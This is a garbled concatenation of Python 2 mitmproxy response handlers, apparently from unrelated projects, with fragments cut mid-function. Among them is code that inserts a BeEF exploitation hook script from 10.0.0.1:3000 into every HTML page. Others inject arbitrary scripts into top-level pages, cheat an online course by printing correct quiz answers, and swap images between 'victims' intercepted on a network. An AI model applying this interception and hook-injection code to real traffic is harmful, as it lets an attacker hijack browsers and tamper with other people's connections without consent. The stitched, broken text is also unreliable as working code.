            flow.response.content = re.sub(r'(MoocPlayer.prototype.switchWindow.*?)\/\*', '/*', flow.response.content, flags=re.DOTALL)
        if 'initdatawithviewer' in flow.request.url:
            # rewrite the reported resume position, then print the question
            # and its correct options (runtime strings kept verbatim)
            flow.response.content = re.sub(r'\"startTime\"\:(\d+)', '"startTime":10', flow.response.content)
            jsonData = json.loads(flow.response.content)
            print "问题:", jsonData[0]["datas"][0]["description"], "答案:",
            for i in jsonData[0]["datas"][0]["options"]:
                if i["isRight"]:
                    print i["description"]
    flow.reply()
def response(context, flow):
    """Inject a <script src=context.src_url> into top-level (referer-less) HTML pages."""
    with decoded(flow.response):  # Remove content encoding (gzip, ...)
        html = BeautifulSoup(flow.response.content)
        """
        # To Allow CORS
        if "Content-Security-Policy" in flow.response.headers:
            del flow.response.headers["Content-Security-Policy"]
        """
        print len(flow.response.headers["referer"])
        # only inject into HTML documents fetched without a Referer header,
        # i.e. top-level navigations rather than sub-resources
        if html.body and ('text/html' in flow.response.headers["content-type"][0]) and len(flow.response.headers["referer"]) == 0:
            script = html.new_tag("script", src=context.src_url)
            html.body.insert(0, script)
            flow.response.content = str(html)
            context.log("******* Filter Injected *******")
def response(context, flow):
    """Append captured-field geometry and MU-per-area stats to mukm_0.txt.

    NOTE(review): duplicate of the earlier getObjectsInCells handler;
    consider consolidating.
    """
    if (flow.request.path == "/rpc/gameplay/getObjectsInCells"):
        with decoded(flow.response):
            try:
                data = json.loads(flow.response.content)
            except ValueError, e:
                # not JSON -- nothing to do
                return 0
            items = data['gameBasket']['gameEntities'].__len__()
            #raise ValueError("length: %d " % items)
            if (items > 0):
                epoch_time = int(time.time())
                name = "mukm_0.txt"
                f = open(name, 'a')
                for item in data['gameBasket']['gameEntities']:
                    entity = item[2]
                    if 'capturedRegion' in entity.keys():
                        # side lengths of the field triangle
                        l1 = distanceGeoPoints(entity['capturedRegion']['vertexA']['location'], entity['capturedRegion']['vertexB']['location'])
                        l2 = distanceGeoPoints(entity['capturedRegion']['vertexB']['location'], entity['capturedRegion']['vertexC']['location'])
                        l3 = distanceGeoPoints(entity['capturedRegion']['vertexA']['location'], entity['capturedRegion']['vertexC']['location'])
                        a = areaFromLength(l1, l2, l3)
                        # score per unit area; * 1.0 forces float division (Python 2)
                        mukm = (int(entity['entityScore']['entityScore']) * 1.0) / a
                        # record: latA,lngA:latB,lngB:latC,lngC:area:score:density
                        f.write("%s" % entity['capturedRegion']['vertexA']['location']['latE6'])
                        f.write(",")
                        f.write("%s" % entity['capturedRegion']['vertexA']['location']['lngE6'])
                        f.write(":")
                        f.write("%s" % entity['capturedRegion']['vertexB']['location']['latE6'])
                        f.write(",")
                        f.write("%s" % entity['capturedRegion']['vertexB']['location']['lngE6'])
                        f.write(":")
                        f.write("%s" % entity['capturedRegion']['vertexC']['location']['latE6'])
                        f.write(",")
                        f.write("%s" % entity['capturedRegion']['vertexC']['location']['lngE6'])
                        f.write(":")
                        f.write("%s" % a)
                        f.write(":")
                        f.write("%s" % entity['entityScore']['entityScore'])
                        f.write(":")
                        f.write("%s" % mukm)
                        f.write("\n")
                f.close()
def response(context, flow):
    """Append a BeEF hook <script> to the <head> of every text/html response."""
    if flow.response.headers.get_first("content-type", "").startswith("text/html"):
        with decoded(flow.response):  # automatically decode gzipped responses.
            # context.log("Type " + str(type(flow.response.content)))
            html = BeautifulSoup(flow.response.content)
            if html.head:
                # https should be considered
                script = html.new_tag("script", src=flow.request.scheme + "://10.0.0.1:3000/hook.js", type="text/javascript")
                html.head.append(script)
                #context.log(html.head)
                flow.response.content = str(html)
                context.log("Beef hook inserted.")
def response(context, flow):
    """Serve local override files in place of responses whose URL matches an override rule."""
    overrideData = getOverrideData()
    with decoded(flow.response):  # automatically decode gzipped responses.
        url = flow.request.scheme + "://" + flow.request.host + flow.request.path
        newResponseContent = ""
        urlMatches = False
        for urlData in overrideData:
            # urlData is (pattern, replacement); first matching rule wins
            urlMatches, freeVars = match(urlData[0], url)
            if urlMatches:
                filePath = matchReplace(urlData[0], urlData[1], url)
                newResponseContent = tryToReadFile(filePath, urlData)
                break
        if urlMatches:
            flow.response.code = 200
            flow.response.content = newResponseContent
def response(context, flow):
    """Collect the request's attributes (with decoded body) into a dict."""
    #Process request
    requestAttrs = [
        "method", "scheme", "host", "port", "path", "httpversion",
        "headers", "content", "form_in", "timestamp_start", "timestamp_end"
    ]
    requestDict = {}
    requestDict['date-sent'] = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
    #Build HTTPRequest dict with decoded data
    with decoded(flow.request):
        for attr in requestAttrs:
            try:
                if attr == "content":
                    # body is kept as raw bytes, not stringified
                    # unocnt = unicode(flow.request.content, errors="xmlcharrefreplace", encoding="utf8")
                    requestDict[attr] = flow.request.content
                else:
                    requestDict[attr] = str(getattr(flow.request, attr))
            except Exception, e:
                # record the failure message in place of the value
                requestDict[attr] = str(e)
def response(context, flow):
    """Write Ingress key markers (including capsule contents) to keymap_<epoch>.json.

    NOTE(review): duplicate of the earlier keymap handler; consider consolidating.
    """
    if (flow.request.path == "/rpc/playerUndecorated/getInventory"):
        with decoded(flow.response):
            try:
                data = json.loads(flow.response.content)
            except ValueError, e:
                # not JSON -- nothing to do
                return 0
            items = data['gameBasket']['inventory'].__len__()
            #raise ValueError("length: %d " % items)
            if (items > 0):
                epoch_time = int(time.time())
                name = "keymap_%d.json" % epoch_time
                markermap = []
                for item in data['gameBasket']['inventory']:
                    # directly-held keys get one color ...
                    marker = keymap(item[2], "#00a0a0")
                    if marker is not None:
                        markermap.append(marker)
                    if 'resource' in item[2].keys():
                        resource = item[2]['resource']['resourceType']
                        if (resource == 'CAPSULE' or resource == 'INTEREST_CAPSULE'):
                            capacity = item[2]['container']['currentCount']
                            capsuleItems = item[2]['container']['stackableItems']
                            if (capacity > 0):
                                # ... keys stored inside capsules get another
                                for itemc in capsuleItems:
                                    marker = keymap(itemc['exampleGameEntity'][2], "#a000a0")
                                    if marker is not None:
                                        markermap.append(marker)
                f = open(name, 'w')
                f.write(json.dumps(markermap))
                f.close()
def response(context, flow):
    """Dump Ingress inventory items with acquisition times to a text file.

    Watches for the getInventory RPC response and writes one
    "<description>:<time>" line per item to time_<epoch>.txt; items nested
    inside CAPSULE / INTEREST_CAPSULE containers are written with the
    capsule's differentiator in place of a timestamp.

    Returns 0 (and does nothing) when the body is not valid JSON.

    Fixes vs. original: Py3-compatible except clause (unused binding
    dropped), len() instead of .__len__(), `with open` so the file closes
    even on a write error, and the local no longer shadows builtin
    `object`.
    """
    if flow.request.path == "/rpc/playerUndecorated/getInventory":
        with decoded(flow.response):  # automatically decode gzipped responses
            try:
                data = json.loads(flow.response.content)
            except ValueError:
                # Not JSON (or truncated) — nothing to dump.
                return 0
            items = len(data['gameBasket']['inventory'])
            if items > 0:
                epoch_time = int(time.time())
                name = "time_%d.txt" % epoch_time
                with open(name, 'w') as f:
                    for item in data['gameBasket']['inventory']:
                        entry = inventory(item[2])
                        ptime = formatms(item[1])
                        out = u'{1}:{0}\n'.format(ptime, entry)
                        f.write(out.encode("utf-8"))
                        if 'resource' in item[2]:
                            resource = item[2]['resource']['resourceType']
                            if resource in ('CAPSULE', 'INTEREST_CAPSULE'):
                                # One level of capsule contents; tagged with
                                # the capsule differentiator, not a time.
                                capacity = item[2]['container']['currentCount']
                                capsuleItems = item[2]['container'][
                                    'stackableItems']
                                capser = item[2]['moniker']['differentiator']
                                if capacity > 0:
                                    for itemc in capsuleItems:
                                        entry = inventory(
                                            itemc['exampleGameEntity'][2])
                                        out = u'{1}:{0}\n'.format(capser,
                                                                  entry)
                                        f.write(out.encode("utf-8"))
def response(context, flow): if flow.response.headers.get_first("content-type", "").startswith("text"): with decoded(flow.response): # automatically decode gzipped responses. soup = BeautifulSoup(flow.response.content, 'lxml') for img in soup("img"): try: src = img['src'] if src[0:4] != "http": src = "http:" + img['src'] print src if src.find(".jpg") > 0 or src.find(".jpeg") > 0: chain = jp2a[src] else: chain = curl['-sS', src] | convert['-', 'jpg:-'] | jp2a['-'] ascii_paragraph = soup.new_tag("p") ascii_paragraph['style'] = css ascii_paragraph.string = chain() img.replace_with(ascii_paragraph) except: img.replace_with("IMAGE") flow.response.content = str(soup)
def handle_response(self, flow):
    """Inject the JavaScript hooking payload into 200 responses, then
    forward the flow to the client.

    The script is injected either as a <script src=...> tag pointing at the
    local serving proxy (INJECT_BY_TAG) or inline as the tag's text.
    """
    if flow.response.code == 200:
        content_type = flow.response.headers['Content-Type']
        # Skip JavaScript bodies: BeautifulSoup entity-encodes HTML chars,
        # so e.g. 'if a && b' would become 'if a &amp;&amp; b'.
        if content_type and len(content_type) != 0 \
                and content_type[0] != 'application/javascript':
            with decoded(flow.response):  # remove content encoding (gzip, ...)
                soup = BeautifulSoup(flow.response.content)
                if soup.body:
                    hook = soup.new_tag("script")
                    if self.INJECT_BY_TAG:
                        hook["src"] = "http://127.0.0.1:" + str(
                            JS_SERVING_PROXY_PORT
                        ) + "/JavaScriptHooks_new_arch.js"
                    else:
                        hook.string = self.script
                    # Prepend so the hooks run before the page's own scripts.
                    soup.body.insert(0, hook)
                    flow.response.content = str(soup)
                    print("JavaScript Functions Hooked.\n")
    # Always pass the (possibly modified) response on.
    flow.reply()
requestDict[attr] = str(getattr(flow.request, attr)) except Exception, e: requestDict[attr] = str(e) #Process response responseAttrs = [ "httpversion", "msg", "headers", "content", "timestamp_start", "timestamp_end" ] responseDict = {} responseDict['date-received'] = datetime.now().strftime( "%Y-%m-%d %H:%M:%S") #Build HTTPResponse dict with decoded data with decoded(flow.response): for attr in responseAttrs: try: if attr == "content": responseDict[attr] = flow.response.content else: responseDict[attr] = str(getattr(flow.response, attr)) except Exception, e: responseDict[attr] = str(e) #Redirect messages to appropaite destinations redirect(requestDict, responseDict, context.endpoint) ''' This method receives an HTTPRequest dict and a HTTPResponse dict, reads its headers and redirects it to the corresponding processor.
def response(context, flow):
    """Hand the decoded response body to the scanner when scanning is on."""
    if not context.scan_responses:
        return
    with decoded(flow.response):  # automatically decode gzipped responses
        process_string(context, flow.response.content, flow)
def response(ctx, flow):
    """Rewrite every occurrence of ctx.old with ctx.new in the body."""
    with decoded(flow.response):  # automatically decode gzipped responses
        body = flow.response.content
        flow.response.content = body.replace(ctx.old, ctx.new)
def response(context, flow):
    """MITM prank: swap image responses between clients on the network.

    For every sufficiently large image requested by a non-admin client, the
    image URL is pooled per client (in the global `victims` dict, mirrored
    to data.txt for an admin monitor). When more than one client is active,
    the requested image is replaced with a random image previously
    requested by a *different* client.

    Relies on module globals: victims, admin_ip, min_img_width,
    min_img_height, max_number_imgs.
    """
    # Only act on image responses, and never for the admin's own machine
    # (which displays the monitor).
    if flow.response.headers.get_first(
            "content-type", "").startswith("image") and str(
                flow.client_conn.address.host) != admin_ip:
        # Requesting client's IP, used as the dict key throughout.
        victim_host = str(flow.client_conn.address.host)
        with decoded(flow.response):  # automatically decode gzipped responses
            # Broad try: any parse/fetch failure leaves the response alone.
            try:
                s = cStringIO.StringIO(flow.response.content)
                img_size = Image.open(s).size
                # Ignore small images (icons, spacers, ...).
                if (int(img_size[0]) > min_img_width
                        or int(img_size[1]) > min_img_height):
                    # First sighting of this client: create its URL pool.
                    if flow.client_conn.address.host not in victims:
                        victims[victim_host] = []
                    # Rebuild the full image URL from host header + path.
                    url_host = flow.request.headers.get_first("host")
                    url_path = flow.request.path
                    # Record the URL in the client's pool and append it to
                    # data.txt so the admin monitor picks it up.
                    victims[victim_host].append("http://" + url_host + url_path)
                    appender = open('data.txt', 'a')
                    appender.write("http://" + url_host + url_path + " ")
                    appender.close()
                    # Count every URL currently pooled, across all clients.
                    number_imgs = 0
                    for sites in victims.values():
                        for site in sites:
                            number_imgs = number_imgs + 1
                    # Cap the pool: evict one random URL from whichever
                    # client currently holds the most.
                    if number_imgs > max_number_imgs:
                        record_holder = ""
                        record = 0
                        # Find the client with the largest pool.
                        for key in victims:
                            count = 0
                            for sites in victims.get(key):
                                count = count + 1
                            if int(count) > int(record):
                                record_holder = str(key)
                                record = int(count)
                        to_delete_from = record_holder
                        # Shuffle + pop() == remove a random entry.
                        random.shuffle(victims.get(to_delete_from))
                        victims.get(to_delete_from).pop()
                        # Rewrite data.txt from scratch to reflect the
                        # eviction on the admin monitor.
                        writer = open('data.txt', 'w')
                        for sites in victims.values():
                            for site in sites:
                                writer.write(site + " ")
                        writer.close()
                    # The swap itself needs at least two known clients.
                    if len(victims) > 1:
                        # Pick a random client other than the requester.
                        # NOTE(review): clients whose pools have emptied are
                        # never removed from `victims`, so this can pick a
                        # partner with no URLs and silently do nothing.
                        random_pick = victim_host
                        while str(random_pick) == str(victim_host):
                            random_pick = random.choice(victims.keys())
                        if len(victims.get(random_pick)) > 0:
                            # Take a random URL out of the partner's pool.
                            random.shuffle(victims.get(random_pick))
                            replace_img = victims.get(random_pick).pop()
                            # Rewrite data.txt again after the removal.
                            writer = open('data.txt', 'w')
                            for sites in victims.values():
                                for site in sites:
                                    writer.write(site + " ")
                            writer.close()
                            # Fetch the replacement image, re-encode it as
                            # JPEG, and substitute it into the response.
                            img_temp = cStringIO.StringIO(
                                urllib.urlopen(str(replace_img)).read())
                            img = Image.open(img_temp)
                            img_return = cStringIO.StringIO()
                            img.save(img_return, "jpeg")
                            flow.response.content = img_return.getvalue()
                            flow.response.headers["content-type"] = [
                                "image/jpeg"
                            ]
            except:  # Unknown image types etc.
                pass